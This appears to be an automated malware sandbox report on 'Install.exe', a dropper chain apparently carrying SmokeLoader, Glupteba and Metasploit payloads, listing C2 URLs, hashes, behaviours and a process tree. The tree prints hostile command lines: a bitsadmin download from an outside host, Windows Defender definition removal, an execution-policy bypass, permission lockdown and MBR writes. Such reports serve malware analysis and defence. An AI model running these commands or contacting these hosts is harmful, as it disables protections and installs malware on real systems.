Resubmissions

25-04-2021 09:42

210425-v9mttlcxke 10

25-04-2021 08:59

210425-1d89vxfyln 10

25-04-2021 07:37

210425-b8smdccdwe 10

25-04-2021 06:55

210425-1csfnkw57n 10

24-04-2021 20:32

210424-x7kp9rrf4x 10

Analysis

  • max time kernel
    204s
  • max time network
    211s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    25-04-2021 06:55

Errors

Reason
Machine shutdown

General

  • Target

    Install.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://al-commandoz.com/upload/

http://antalya-belek.com/upload/

http://luxurysv.com/upload/

http://massagespijkenisse.com/upload/

http://rexgorellhondaevent.com/upload/

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

rc4.i32
rc4.i32

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 3 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 26 IoCs
  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 15 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 10 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:460
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:872
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:7488
    • C:\Users\Admin\AppData\Local\Temp\Install.exe
      "C:\Users\Admin\AppData\Local\Temp\Install.exe"
      1⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1072
      • C:\Users\Admin\AppData\Local\Temp\is-SVLFU.tmp\Install.tmp
        "C:\Users\Admin\AppData\Local\Temp\is-SVLFU.tmp\Install.tmp" /SL5="$6015A,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1224
        • C:\Users\Admin\AppData\Local\Temp\is-9K7B6.tmp\Ultra.exe
          "C:\Users\Admin\AppData\Local\Temp\is-9K7B6.tmp\Ultra.exe" /S /UID=burnerch1
          3⤵
          • Drops file in Drivers directory
          • Executes dropped EXE
          • Adds Run key to start application
          • Drops file in Program Files directory
          • Suspicious use of WriteProcessMemory
          PID:1676
          • C:\Program Files\Windows Mail\VDDUPATRND\ultramediaburner.exe
            "C:\Program Files\Windows Mail\VDDUPATRND\ultramediaburner.exe" /VERYSILENT
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1476
            • C:\Users\Admin\AppData\Local\Temp\is-R6H97.tmp\ultramediaburner.tmp
              "C:\Users\Admin\AppData\Local\Temp\is-R6H97.tmp\ultramediaburner.tmp" /SL5="$80128,281924,62464,C:\Program Files\Windows Mail\VDDUPATRND\ultramediaburner.exe" /VERYSILENT
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in Program Files directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of WriteProcessMemory
              PID:856
              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                6⤵
                • Executes dropped EXE
                PID:1820
          • C:\Users\Admin\AppData\Local\Temp\89-9ccda-642-cc7ac-fde0a7629a9db\Huxelufyli.exe
            "C:\Users\Admin\AppData\Local\Temp\89-9ccda-642-cc7ac-fde0a7629a9db\Huxelufyli.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:1300
            • C:\Program Files\Internet Explorer\iexplore.exe
              "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
              5⤵
              • Modifies Internet Explorer settings
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:1276
              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1276 CREDAT:275457 /prefetch:2
                6⤵
                • Modifies Internet Explorer settings
                • Suspicious use of SetWindowsHookEx
                PID:888
          • C:\Users\Admin\AppData\Local\Temp\e5-a655a-204-f45a3-6ef9c1579b0b2\Caerytemoba.exe
            "C:\Users\Admin\AppData\Local\Temp\e5-a655a-204-f45a3-6ef9c1579b0b2\Caerytemoba.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1228
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\io5inpbq.0mm\google-game.exe & exit
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:7116
              • C:\Users\Admin\AppData\Local\Temp\io5inpbq.0mm\google-game.exe
                C:\Users\Admin\AppData\Local\Temp\io5inpbq.0mm\google-game.exe
                6⤵
                • Executes dropped EXE
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:7240
                • C:\Windows\SysWOW64\rundll32.exe
                  "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                  7⤵
                  • Loads dropped DLL
                  • Modifies registry class
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:7368
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\44z14rch.z1q\md1_1eaf.exe & exit
              5⤵
                PID:8112
                • C:\Users\Admin\AppData\Local\Temp\44z14rch.z1q\md1_1eaf.exe
                  C:\Users\Admin\AppData\Local\Temp\44z14rch.z1q\md1_1eaf.exe
                  6⤵
                  • Executes dropped EXE
                  • Modifies system certificate store
                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                  PID:8180
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\njmuibe0.wsq\askinstall39.exe & exit
                5⤵
                  PID:12404
                  • C:\Users\Admin\AppData\Local\Temp\njmuibe0.wsq\askinstall39.exe
                    C:\Users\Admin\AppData\Local\Temp\njmuibe0.wsq\askinstall39.exe
                    6⤵
                    • Executes dropped EXE
                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                    • Suspicious use of AdjustPrivilegeToken
                    PID:12644
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /c taskkill /f /im chrome.exe
                      7⤵
                        PID:14732
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /f /im chrome.exe
                          8⤵
                          • Kills process with taskkill
                          PID:15164
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wn0mche2.t4h\inst.exe & exit
                    5⤵
                      PID:15484
                      • C:\Users\Admin\AppData\Local\Temp\wn0mche2.t4h\inst.exe
                        C:\Users\Admin\AppData\Local\Temp\wn0mche2.t4h\inst.exe
                        6⤵
                        • Executes dropped EXE
                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                        PID:15524
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1beafxpi.ada\SunLabsPlayer.exe /S & exit
                      5⤵
                        PID:15644
                        • C:\Users\Admin\AppData\Local\Temp\1beafxpi.ada\SunLabsPlayer.exe
                          C:\Users\Admin\AppData\Local\Temp\1beafxpi.ada\SunLabsPlayer.exe /S
                          6⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Drops file in Program Files directory
                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                          PID:15720
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy10A6.tmp\tempfile.ps1"
                            7⤵
                              PID:16160
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy10A6.tmp\tempfile.ps1"
                              7⤵
                                PID:17040
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy10A6.tmp\tempfile.ps1"
                                7⤵
                                  PID:17356
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy10A6.tmp\tempfile.ps1"
                                  7⤵
                                  • Drops file in Program Files directory
                                  PID:10960
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy10A6.tmp\tempfile.ps1"
                                  7⤵
                                  • Drops file in Program Files directory
                                  PID:11192
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy10A6.tmp\tempfile.ps1"
                                  7⤵
                                    PID:5728
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy10A6.tmp\tempfile.ps1"
                                    7⤵
                                    • Checks for any installed AV software in registry
                                    PID:6004
                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                    "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                    7⤵
                                    • Download via BitsAdmin
                                    PID:3756
                                  • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                    "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pDeO7Jw1fMUeRqaw -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                    7⤵
                                    • Executes dropped EXE
                                    • Drops file in Program Files directory
                                    PID:3340
                                  • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                    "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pPPviIyAEhz2BJi1 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                    7⤵
                                    • Executes dropped EXE
                                    PID:3424
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy10A6.tmp\tempfile.ps1"
                                    7⤵
                                      PID:3492
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy10A6.tmp\tempfile.ps1"
                                      7⤵
                                        PID:4104
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy10A6.tmp\tempfile.ps1"
                                        7⤵
                                        • Drops file in Program Files directory
                                        PID:4368
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy10A6.tmp\tempfile.ps1"
                                        7⤵
                                          PID:4656
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy10A6.tmp\tempfile.ps1"
                                          7⤵
                                            PID:4936
                                          • C:\Windows\SysWOW64\rundll32.exe
                                            C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\JEuiESaG\JEuiESaG.dll" JEuiESaG
                                            7⤵
                                            • Loads dropped DLL
                                            PID:5224
                                            • C:\Windows\system32\rundll32.exe
                                              C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\JEuiESaG\JEuiESaG.dll" JEuiESaG
                                              8⤵
                                              • Loads dropped DLL
                                              • Drops file in System32 directory
                                              PID:5240
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy10A6.tmp\tempfile.ps1"
                                            7⤵
                                              PID:5344
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy10A6.tmp\tempfile.ps1"
                                              7⤵
                                                PID:6260
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy10A6.tmp\tempfile.ps1"
                                                7⤵
                                                  PID:6500
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy10A6.tmp\tempfile.ps1"
                                                  7⤵
                                                  • Drops file in Program Files directory
                                                  PID:6704
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy10A6.tmp\tempfile.ps1"
                                                  7⤵
                                                    PID:6996
                                                  • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                    "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                    7⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    PID:7772
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2ux1z4yl.nqx\GcleanerWW.exe /mixone & exit
                                                5⤵
                                                  PID:15856
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vrobtpca.msq\toolspab1.exe & exit
                                                  5⤵
                                                    PID:15928
                                                    • C:\Users\Admin\AppData\Local\Temp\vrobtpca.msq\toolspab1.exe
                                                      C:\Users\Admin\AppData\Local\Temp\vrobtpca.msq\toolspab1.exe
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious use of SetThreadContext
                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                      PID:15960
                                                      • C:\Users\Admin\AppData\Local\Temp\vrobtpca.msq\toolspab1.exe
                                                        C:\Users\Admin\AppData\Local\Temp\vrobtpca.msq\toolspab1.exe
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Checks SCSI registry key(s)
                                                        • Suspicious behavior: MapViewOfSection
                                                        PID:16208
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mf2uoz4m.iao\c7ae36fa.exe & exit
                                                    5⤵
                                                      PID:16012
                                                      • C:\Users\Admin\AppData\Local\Temp\mf2uoz4m.iao\c7ae36fa.exe
                                                        C:\Users\Admin\AppData\Local\Temp\mf2uoz4m.iao\c7ae36fa.exe
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Checks SCSI registry key(s)
                                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                        • Suspicious behavior: MapViewOfSection
                                                        PID:16040
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wv0ffbmr.1ut\app.exe /8-2222 & exit
                                                      5⤵
                                                        PID:16064
                                                        • C:\Users\Admin\AppData\Local\Temp\wv0ffbmr.1ut\app.exe
                                                          C:\Users\Admin\AppData\Local\Temp\wv0ffbmr.1ut\app.exe /8-2222
                                                          6⤵
                                                          • Executes dropped EXE
                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                          PID:16108
                                                          • C:\Users\Admin\AppData\Local\Temp\wv0ffbmr.1ut\app.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\wv0ffbmr.1ut\app.exe" /8-2222
                                                            7⤵
                                                            • Executes dropped EXE
                                                            • Modifies data under HKEY_USERS
                                                            PID:16664
                                              • C:\Users\Admin\AppData\Local\Temp\464.exe
                                                C:\Users\Admin\AppData\Local\Temp\464.exe
                                                1⤵
                                                • Executes dropped EXE
                                                • Adds Run key to start application
                                                PID:11516
                                                • C:\Windows\SysWOW64\icacls.exe
                                                  icacls "C:\Users\Admin\AppData\Local\4e02ebbf-3f77-40cb-823c-04f21c0b3e98" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                  2⤵
                                                  • Modifies file permissions
                                                  PID:11736
                                                • C:\Users\Admin\AppData\Local\Temp\464.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\464.exe" --Admin IsNotAutoStart IsNotTask
                                                  2⤵
                                                  • Executes dropped EXE
                                                  PID:11888
                                                  • C:\Users\Admin\AppData\Local\8f99277a-9e78-4b69-88a0-e14bdfd9f326\updatewin1.exe
                                                    "C:\Users\Admin\AppData\Local\8f99277a-9e78-4b69-88a0-e14bdfd9f326\updatewin1.exe"
                                                    3⤵
                                                    • Executes dropped EXE
                                                    PID:12056
                                                    • C:\Users\Admin\AppData\Local\8f99277a-9e78-4b69-88a0-e14bdfd9f326\updatewin1.exe
                                                      "C:\Users\Admin\AppData\Local\8f99277a-9e78-4b69-88a0-e14bdfd9f326\updatewin1.exe" --Admin
                                                      4⤵
                                                      • Executes dropped EXE
                                                      PID:12024
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
                                                        5⤵
                                                          PID:12184
                                                        • C:\Program Files\Windows Defender\mpcmdrun.exe
                                                          "C:\Program Files\Windows Defender\mpcmdrun.exe" -removedefinitions -all
                                                          5⤵
                                                          • Deletes Windows Defender Definitions
                                                          PID:12412
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -NoProfile -ExecutionPolicy Bypass -Command "& {Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -File ""C:\Users\Admin\AppData\Local\script.ps1""' -Verb RunAs}"
                                                          5⤵
                                                            PID:12456
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd /c ""C:\Users\Admin\AppData\Local\Temp\delself.bat""
                                                            5⤵
                                                              PID:12468
                                                        • C:\Users\Admin\AppData\Local\8f99277a-9e78-4b69-88a0-e14bdfd9f326\updatewin2.exe
                                                          "C:\Users\Admin\AppData\Local\8f99277a-9e78-4b69-88a0-e14bdfd9f326\updatewin2.exe"
                                                          3⤵
                                                          • Drops file in Drivers directory
                                                          • Executes dropped EXE
                                                          PID:11992
                                                        • C:\Users\Admin\AppData\Local\8f99277a-9e78-4b69-88a0-e14bdfd9f326\5.exe
                                                          "C:\Users\Admin\AppData\Local\8f99277a-9e78-4b69-88a0-e14bdfd9f326\5.exe"
                                                          3⤵
                                                            PID:12332
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 12332 -s 232
                                                              4⤵
                                                              • Program crash
                                                              PID:12652
                                                      • C:\Users\Admin\AppData\Local\Temp\84B.exe
                                                        C:\Users\Admin\AppData\Local\Temp\84B.exe
                                                        1⤵
                                                        • Executes dropped EXE
                                                        • Writes to the Master Boot Record (MBR)
                                                        PID:11620

                                                      Network

                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                      Execution

                                                      Command-Line Interface

                                                      1
                                                      T1059

                                                      Persistence

                                                      Registry Run Keys / Startup Folder

                                                      1
                                                      T1060

                                                      Bootkit

                                                      1
                                                      T1067

                                                      BITS Jobs

                                                      1
                                                      T1197

                                                      Defense Evasion

                                                      Impair Defenses

                                                      1
                                                      T1562

                                                      File Permissions Modification

                                                      1
                                                      T1222

                                                      Modify Registry

                                                      3
                                                      T1112

                                                      BITS Jobs

                                                      1
                                                      T1197

                                                      Install Root Certificate

                                                      1
                                                      T1130

                                                      Credential Access

                                                      Credentials in Files

                                                      1
                                                      T1081

                                                      Discovery

                                                      Software Discovery

                                                      1
                                                      T1518

                                                      Security Software Discovery

                                                      1
                                                      T1063

                                                      Query Registry

                                                      3
                                                      T1012

                                                      System Information Discovery

                                                      3
                                                      T1082

                                                      Peripheral Device Discovery

                                                      1
                                                      T1120

                                                      Collection

                                                      Data from Local System

                                                      1
                                                      T1005

                                                      Command and Control

                                                      Web Service

                                                      1
                                                      T1102

                                                      Replay Monitor

                                                      Loading Replay Monitor...

                                                      Downloads

                                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                        MD5

                                                        7124be0b78b9f4976a9f78aaeaed893a

                                                        SHA1

                                                        804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                        SHA256

                                                        bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                        SHA512

                                                        49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                        MD5

                                                        7124be0b78b9f4976a9f78aaeaed893a

                                                        SHA1

                                                        804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                        SHA256

                                                        bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                        SHA512

                                                        49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                      • C:\Program Files\Windows Mail\VDDUPATRND\ultramediaburner.exe
                                                        MD5

                                                        6103ca066cd5345ec41feaf1a0fdadaf

                                                        SHA1

                                                        938acc555933ee4887629048be4b11df76bb8de8

                                                        SHA256

                                                        b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                        SHA512

                                                        a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                      • C:\Program Files\Windows Mail\VDDUPATRND\ultramediaburner.exe
                                                        MD5

                                                        6103ca066cd5345ec41feaf1a0fdadaf

                                                        SHA1

                                                        938acc555933ee4887629048be4b11df76bb8de8

                                                        SHA256

                                                        b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                        SHA512

                                                        a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                      • C:\Program Files\install.dat
                                                        MD5

                                                        31e4a5735b20be6a53cbb552663b1cc3

                                                        SHA1

                                                        c080a61b65a34928a1fb1899db8a3698a4892a4c

                                                        SHA256

                                                        b28936c7d89e33fdc4eace2d0e92ed7d3b02bbfc5e7c8297d16f721d0254305f

                                                        SHA512

                                                        3e98a84f11ca1eb27e894ce6ac7c6ff6c37382459a467ef30a87bfe36149960c5c76f2beeb9415ab3287f002012e65c4f754dcd17045986306c6afab399a0604

                                                      • C:\Program Files\install.dll
                                                        MD5

                                                        fe60ddbeab6e50c4f490ddf56b52057c

                                                        SHA1

                                                        6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                        SHA256

                                                        9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                        SHA512

                                                        0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                        MD5

                                                        cd9b447a4281d25e66e81dff14bb76fe

                                                        SHA1

                                                        8280008467812a7d7a580e8a78b30347bc47c470

                                                        SHA256

                                                        b3a34a976f6e13f42fbe046a944ba2e5df679b85dca0d7ad247136ec50e5f6e0

                                                        SHA512

                                                        78a87e53242f981667e97e4d25c18036f8db066125b7c9256ecf815dd6f52bde96c4580f8ff4d36a8076c341aa0a39ad3de881a7f338346d0170278f63bc211e

                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                        MD5

                                                        09e67c5057b6def0b57f60a0c91345d3

                                                        SHA1

                                                        e0e57462be79d9562f38abdafaba85b69277e009

                                                        SHA256

                                                        5248cba986c74dde785019a97c2094f71fbd5cc1f65c949301e59364cf0bd666

                                                        SHA512

                                                        07f1241f25645df107c8fae657dcb6ef6ed78564085e843624e37fcf43bcf2faf3460a429fb48483da09c291f960aecbb681ef2ce6375cb0b83ed70c07ed82dd

                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                        MD5

                                                        50d09c7d775ae2cc542581466c15eafd

                                                        SHA1

                                                        6851665b3577889093b338cd04eefbc77612bd0d

                                                        SHA256

                                                        7fc30a2bafe437fda7d8cdd1a7db84c21cf3ec5859f6c94aa89a577a1591bc9b

                                                        SHA512

                                                        555b4c4d6ee9507f5606f4fc53f6a65982b151e18b444f511ad3959849858b252001782fa30c2873ef2dfd22f614420b10e2e339b95848b7b3cedabd60f85b58

